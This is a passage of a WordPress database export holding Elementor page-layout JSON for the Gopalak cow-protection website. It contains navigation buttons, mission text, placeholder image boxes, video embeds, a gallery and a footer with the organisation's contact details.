ackground_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9693,1632,'_elementor_page_assets','a:0:{}'),(9695,1633,'_elementor_edit_mode','builder'),(9696,1633,'_elementor_template_type','wp-page'),(9697,1633,'_elementor_version','3.7.8'),(9698,1633,'_wp_page_template','elementor_canvas'),(9699,1633,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec 